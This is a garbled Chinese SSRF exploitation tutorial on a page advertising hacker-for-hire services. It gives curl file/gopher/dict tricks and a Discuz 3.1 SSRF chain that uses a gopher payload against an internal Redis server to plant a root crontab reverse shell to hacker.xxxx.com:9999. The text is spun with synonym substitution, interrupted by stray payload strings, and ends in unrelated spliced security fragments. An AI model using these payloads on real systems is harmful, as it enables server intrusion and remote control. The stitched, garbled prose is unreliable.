什么是SSRF?

　　SSRF(Server-Side Request Forgery，服运用inputUsername=%25%32%61%25%32%39%25%32%39%25%32%38%25%37%63%25%32%38§uid§%25%33%64%25%32%61&inputOTP=1234进行参数fuzz务器端恳求假造)是一种由侵犯者结构恳求，运用服务器端建议的安全缝隙。一般情况下，SSRF侵犯的政策是外网无法拜访的内部系统(正因为恳求是由服务器端建议的，所以服务器能恳求到与本身相连而外网阻隔的内部系统)。

　　Example：

　　GET /index.php?url=http://google.com/ HTTP/1.1

　　Host: example.com

　　在这儿，http://example.com从它的服务器获取http://google.com

　　

　　目录

　　0X00 SSRF的类型

　　0X01 什么当地最简略出现SSRF

　　0X02 SSRF缝隙的损害

　　0X03 SSRF神器Curl的运用

　　0X04 最常用的跳转绕过

　　0X05 Python+SSRF完结端口扫描

　　0X06 运用Discuz的SSRF缝隙GetShell

　　0X07 简略的绕过SSRF图片的约束

　　0X08 或许遇到的问题

　　0X09 常用发掘SSRF缝隙的东西

　　0X00 SSRF的类型

　　1. 显现侵犯者的呼应(Basic)

　　2. 不显现呼应(Blind)

　　0X01 什么当地最简略出现SSRF

　　云服务器商。(各种网站数据库操作)

　　有远程图片加载的当地。(编辑器之类的有远程图片加载啊)

　　网站收集、网页抓取的当地。(许多网站会有新闻收集输入url然后一键收集)

　　头像的当地。(某易就喜爱远程加载头像，例如:https://www.xxxx.com/image?url=https://www.hack56.com/images/4c2fxfocclj.jpg)

　　最终一个全部要你输入网址的当地和可以输入ip的都放，都是ssrf的全国。

　　0X02 SSRF缝隙的损害

　　对服务器地点的内网进行端口扫描，获取一些服务的banner信息等

　　侵犯作业在内网或许本地的运用程序

　　对内网WEB运用进行指纹识别，通过拜访默许文件完结(Readme等文件)

　　侵犯内外网的WEB运用，首要是GET就可以完结的侵犯(比如Struts2，SQL注

本渗透检验练习供应专门的练习途径，我们可以在pentesterLab中下载VM镜像，还可以读一下原文英文教程。入等)

　　下载内网资源(运用file协议读取本地文件等)

　　运用Redis未授权拜访，HTTP CRLF注入到达getshell

　　wooyun峰会猪猪侠的ppt

　　进行跳板

　　无视cdn

　　0X03 SSRF神器Curl的运用

　　检查curl支撑的协议列表 #curl--config –protocols

　　运用curl读取文件

　　curl -v file:///etc/passwd

　　运用ftp协议

　　curl -v "ftp://127.0.0.1:6666/info"

　　运用dict协议

　　curl -v "dict://127.0.0.1:6666/info"

　　运用gopher协议

　　curl -v "gopher://127.0.0.1:6666/_info"

　　0X04最常用的跳转绕过

　　

　　0X05 Python+SSRF完结端口扫描

　　简略的端口扫描

　　

　　一起调查Wireshark整个扫描流程

　　

　　代码完结：

　　

　　验证本地是否敞开了相应的端口

　　

　　Python代码编写的思路：

　　端口存在衔接会一直在衔接，衔接时间会很长。

　　

　　端口不存在的衔接会被立马改写

　　

　　0X06 运用Discuz的SSRF缝隙GetShell

　　Discuz无条件约束ssrf缝隙(<=3.1检验是有这个缝隙)

　　试验环境：

　　172.28.100.109 为Discuz 3.1(Win10)，172.28.100.108为Redis服务器(CentOS)，hacker.xxxx.com为公网检验服务器首要寄存ssrf用的php文件

　　Discuz3.1下载地址：

　　http://www.comsenz.com/downloads/install/discuzx#down_open

　　

　　示例：

　　/forum.php?mod=ajax&action=downremoteimg&message=[img]https://www.hack56.com/images/nb1c3wgcnur.jpg[/img]

　　实际运用payload：

　　http://127.0.0.1/Discuz_X3.1/upload/forum.php?mod=ajax&action=downremoteimg&message=[img]https://www.hack56.com/images/imscepqzj0p.jpg[/img]

　　运用nc来检验SSRF缝隙

　　http://127.0.0.1/Discuz_X3.1/upload/forum.php?mod=ajax&action=downremoteimg&message=[img]http://172.28.100.108:6666/?data=root.jpg[/img]

　　

　　tcpdump抓包看到Discuz发来的数据包

　　

　　nc也有反响了

　　

　　底子可以承认这儿是有SSRF缝隙

　　运用header 来合作ssrf缝隙运用，在我公网服务器放了一个ssrf.php

　　

　　header("Location: ftp://172.28.100.108:6666/info");

　　?>

　　这儿我是通过传参的办法，便利检验时分批改参数，代码如下：

　　

　　PAYLOAD：

　　http://127.0.0.1/Discuz_X3.1/upload/forum.php?mod=ajax&action=downremoteimg&message=[img]https://www.hack56.com/images/imscepqzj0p.jpg[/img]

　　相同nc也接受到了数据，检验时分发现ftp协议比http要快一些

　　

　　KALI机器翻开socat端口转发(-v参数可以将转发进程的日志记载打印出来)

　　socat -v tcp-listen:6666,fork tcp-connect:172.28.100.108:6379

　　

　　衔接SSRF脚本

　　#留意centos和ubuntu系统的计划任务有些不一样，centos默许在/var/spool/cron/root，ubuntu默许是在/etc/crontab

　　

　　实行成功

　　#第四步能实行成功的条件有必要政策目录有写权限

　　

　　到redis服务器的上检查/var/spool/cron目录下现已创建了root文件内容为*/1 * * * * bash -i >&/dev/tcp/hacker.xxxx.com/9999 0>&1

　　

　　将socat的输出信息保存为1.txt，上传到公网服务器上

　　

　　运用Python脚本转换为gopher支撑的格局

　　

　　留意最终要检查一下格局是否完好：*/1 * * * * bash -i >& /dev/tcp/hacker.xxx.com/99990>&1

　　新建gohper.php文件放到我自己的云服务器的网站根目录上，当Discuz拜访gohper.php文件时分就会跳转302跳转运用gohper协议拜访内部redis服务器

　　

　　规范格局示例：

　　

　　header("Location:gopher://172.28.100.108:6379/_*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$6我们通过文档知道，socket套接字的send()函数只能发送字节数据。所以实在的数据包构建应该在这儿。2%0d%0a%0a%0a%0a*/1* * * * bash -i >& /dev/tcp/hacker.xxxx.com/9999 0>&1%0a%0a%0a%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0a*1%0d%0a$4%0d%0aquit%0d%0a%0a");

　　?>

　　政策机器SSRF缝隙的运用

　　

　　进程中运用Wireshark抓包调查进程

　　

　　政策redis服务器上发现计划任务现已收效了，假设这儿有乱码，请翻倒文章底部有处理计划

　　

　　政策Redis的shell现已发给我的服务器了

　　

　　0X07 简略的绕过SSRF图片的约束

　　Apache装备/etc/apache2/sites-enabled/，新建一个apache的装备文件123.conf

　　AddHandler application/x-httpd-php .php

　　这样apache就会把jpg也当作php解析;假设我们遇到约束了jpg后缀的ssrf缝隙就可以运用该办法，同理假设约束了txt的话。我们在apache设置把txt当作php解析即可。

　　

　　将文件名命名为1.php.jpg即可拜访

　　

　　也可以这样写AddHandler application/x-httpd-php .jpg

　　

　　0X08 或许遇到的问题

　　以下问题是因为我用的linux上vim编辑器导致的，后运用Sublime编辑器处理了乱码问题

　　

　　0X09 常用发掘SSRF缝隙的东西

　　运用F12，检查网站的 *** 恳求

　　运用Googldef foo(): eHacking,如site:www.baidu.com，然后查找网站是否有关于url的远程调用

　　作者：WHITE

　　来历：Ms08067安全试验室

黑客在线接单:SSRF缝隙使用与getshell实战

c:users%username%appdatalocalpackagesMicrosoft.MicrosoftEdge_8wekyb3d8bbwe tab_test[TST_OPENDIR].func = checkopendir;SSRF漏洞利用与getshell实战

黑客在线接单从法则对 *** 安全要求趋严的大环境下，对服务器的有用的加固是比不可少的环节，本文抛砖引玉，希望更多的业界从业人员同享自己的一线阅历。笔者行文匆忙，定有不足之处，还望各位纠正！据悉，该缝隙问题其实早在2017年4月9日就被安全团队exploitee.rs在上一年Def Con上的设备缝隙集锦《All Your Things Are Belong To Us!》中宣布过，但当exploitee向西部数据反响后，西部数据却拒绝招认和批改该缝隙，因此，毫无办法的exploitee团队只好在本年8月编写出了缝隙运用的Metasploit模块，并以对外发布了该缝隙。总结这部分代码的作者在完结的时分未考虑该情况，才导致该bug的出现，我们只需求判别一下是否加载了该扩展就批改了该bug。

在点评任何安全处理计划时，重要的是要了解该处理计划是否会通过要求许多的支撑来减损您的资源，而不是容许您的团队像一个顾客相同，专注于处理计划中的数据。黑客在线接单

lopen：翻开本地目录下面我们来介绍怎样让history日志记载更细化，更便于我们审计分析。这些描述不完全准确或详细，但对我们的目的来说足够了。当然这不是详尽的列表，还有其他类型的署理，但我们只对这两种署理感兴趣。讲真，其实我们只对TLS中止署理感兴趣。

$url = $_SERVER['PHP_SELF'];

一、技术实施布景

在进行了深化分析之后我们发现，代码中最重要的一个政策参数是一个指向可实行文件的途径地址，所以我们首要检验的是Casey Smith发布的payload:Regsvr32.exe。但是，我们仍然无法让IHxHelpPaneServer服务器的实行函数来接收我们所供应的参数。

1月18日：CouchDB、Hadoop，分别影响452和182台服务器

SSRF漏洞利用与getshell实战

黑客在线接单幽默的是，NtQueueApcThread接受的APC函数的指针并不是调用者传递给QueueUserApc的原始APCProc函数指针。 相反，实践传递的函数指针是ntdll!RtlDispatchAPC，而且传递给QueueUserApc的原始APCProc函数是作为参数传递给ntdll！RtlDispatchAPC的。BLU Studio G Plus客户端软件SSL：　　1、电脑中了ARP病毒，这种感觉病毒传播速度很快，一般局域网内有一台中毒，其它也很难逃过，所以要找到ARP侵犯主机!假设有一天你的电脑老掉线或极慢，就要考虑你的电脑是否也感染了病毒!

对Android app进行静态分析是一种常见的缝隙查找办法，可以运用Dex2Jar获取app的.java文件。指令如下：qemu-system-arm -kernel qemu_kernel_3.2.27_with_CIFS -cpu arm1176 -m 256 -M versatilepb -no-reboot -serial stdio -append "root=/dev/sda2 panic=1 rootfstype=ext4 rw init=/bin/bash" -hda 2014-06-20-wheezy-raspbian.imgint 黑客在线接单

for i in disas:　　关于系统处理员来说，每天进行安全缝隙分析和软件更新是每日必需的底子活动。为了避免出产环境中的缺点，对系统处理员来说选择不运用由保处理器供应的自动更新选项并实行手动更新非常常见。但是这会导致以下问题的发生：

恶意程序作者除了通过JPush SDK远程控制用户手机进行上述操作外，还会在程序设备作业后躲藏图标并在后台私自向主控手机号码发送受害用户手机IMEI信息，诱导用户输入身份证信息并收集相关的隐私信息。SSRF漏洞利用与getshell实战

{

昨日想登录那服务器的时分发现账户被删了, 想用shift后门的时分发现后门居然被替换了...假设可以成功的运用此缝隙，你也可以作业自己的shellcode，并实践运用该缝隙做点有用的作业，而不仅仅是让程序溃散。比如shellcode可以翻开一个指令终端，下载并实行文件，重启计算机、启用远程桌面、或其他操作。

一、问题的提出：
本文标题:黑客在线接单:SSRF缝隙使用与getshell实战